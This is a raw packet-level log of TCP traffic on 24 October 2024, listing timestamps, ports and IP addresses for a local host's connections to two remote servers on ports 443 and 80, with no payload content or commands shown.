Oct 24, 2024 21:23:11.518508911 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.518537998 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.518539906 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.518554926 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.518599987 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.518614054 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.518656969 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.518691063 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.518712997 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.518727064 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.518778086 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.518785954 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.518799067 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.518836975 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.518850088 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.518862963 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.518903017 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.518918991 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.518932104 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.518970013 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.519013882 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.519049883 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.519053936 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.519068003 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.519113064 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.519125938 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.519404888 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.519442081 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.519476891 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.519481897 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.519495964 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.519543886 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.519578934 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.519629002 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.519665003 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.519731045 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.519747019 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.519798040 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.519798994 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.519812107 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.519867897 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.519880056 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.520179987 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.520226002 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.520241976 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.520255089 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.520312071 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.524327993 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.558413982 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.558491945 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.558512926 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.558629036 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.558677912 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.558690071 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.558711052 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.558764935 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.558778048 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.558878899 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.558909893 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.558928013 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.558948994 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.558984995 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.559010029 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.559022903 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.559057951 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.559088945 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.559092999 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.559107065 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.559135914 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.559164047 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.559200048 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.559222937 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.559235096 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.559278011 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.559293032 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.559305906 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.559367895 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.559386969 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.559400082 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.559446096 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.559448957 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.559462070 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.559520006 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.599531889 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.599594116 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.599625111 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.599666119 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.599679947 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.599725962 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.599735975 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.599749088 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.599782944 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.599802017 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.599814892 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.599872112 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.599884987 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.611979961 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.612035990 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.612035990 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.612051010 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.612098932 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.612112045 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.612368107 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.612435102 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.612447977 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.612550974 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.612608910 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.612621069 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.612791061 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.612833977 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.612848043 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.612859964 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.612925053 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.613112926 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.613209009 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.613266945 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.613270998 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.613292933 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.613341093 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.613353014 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.613404036 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.613461971 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.613475084 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.639015913 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.639091969 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.639112949 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.639128923 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.639178038 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.639184952 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.639199018 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.639250040 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.639250994 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.639264107 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.639328957 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.639341116 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.639385939 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.639432907 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.639435053 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.639446974 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.639497042 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.639498949 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.639508963 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.639553070 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.639564991 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.639633894 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.639689922 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.639697075 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.639708996 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.639755964 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.639767885 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.639794111 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:11.639846087 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:11.640119076 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:22.427126884 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:22.432964087 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:22.433027029 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:22.433092117 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:22.438534021 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.087599039 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.087626934 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.087644100 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.087660074 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.087677956 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.087694883 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.087703943 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.087718964 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.087735891 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.087775946 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.087802887 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.087804079 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.093305111 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.093364000 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.093460083 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.202773094 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.202869892 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.202887058 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.202958107 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.202975988 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.203010082 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.208260059 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.208301067 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.208317995 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.208333969 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.208336115 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.208375931 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.213901043 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.213926077 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.213941097 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.213963985 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.214010000 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.246849060 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.246900082 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.246937990 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.246975899 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.318694115 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.318737984 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.318793058 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.318804979 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.318844080 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.318864107 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.318880081 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.318916082 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.318932056 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.318955898 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.319013119 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.319365978 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.319401979 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.319436073 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.319458008 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.362215042 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.362265110 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.362303972 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.362334967 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.362338066 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.362365007 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.362379074 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.362416029 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.362432003 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.434499025 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.434612036 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.434647083 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.434684038 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.434693098 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.434693098 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.434720039 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.434782028 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.434828043 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.434911966 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.434946060 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.434961081 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.434981108 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.435034037 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.477334976 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.477385044 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.477421999 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.477456093 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.477463961 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.477505922 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.477521896 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.548780918 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.548871040 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.548903942 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.548926115 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.548942089 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.548965931 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.548981905 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.549026012 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.549173117 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.549490929 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.549525976 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.549544096 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.549565077 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.549618959 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.550023079 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.550059080 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.550092936 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.550106049 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.593139887 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.593163967 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.593182087 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.593199968 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.593218088 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.593230963 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.593230963 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.593318939 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.664285898 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.664408922 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.664443016 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.664482117 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.664513111 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.664552927 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.664562941 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.664741993 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.664781094 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.664788961 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.664818048 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.664870977 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.665116072 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.665150881 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.665185928 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.665199041 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.707962036 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.707984924 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.708002090 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.708091021 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.708106995 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.708165884 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.708182096 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.708190918 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.708230019 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.752367020 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.752410889 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.752501011 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.779720068 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.779767036 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.779810905 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.779849052 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.779885054 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.779903889 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.779951096 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.780002117 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.780044079 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.780081987 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.780111074 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.780421972 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.780474901 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.780567884 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.780658007 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.780724049 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.823470116 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.823559046 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.823596954 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.823633909 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.823648930 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.823672056 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.823709965 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.823728085 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.894783974 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.894807100 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.894824982 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.894895077 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:23.894926071 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.894992113 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.895009041 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:23.895061970 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:24.191745996 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:24.191831112 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:24.191865921 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:24.191931009 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:24.191971064 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:24.192013979 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:24.192068100 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:24.192078114 CEST	80	49170	192.3.176.141	192.168.2.22
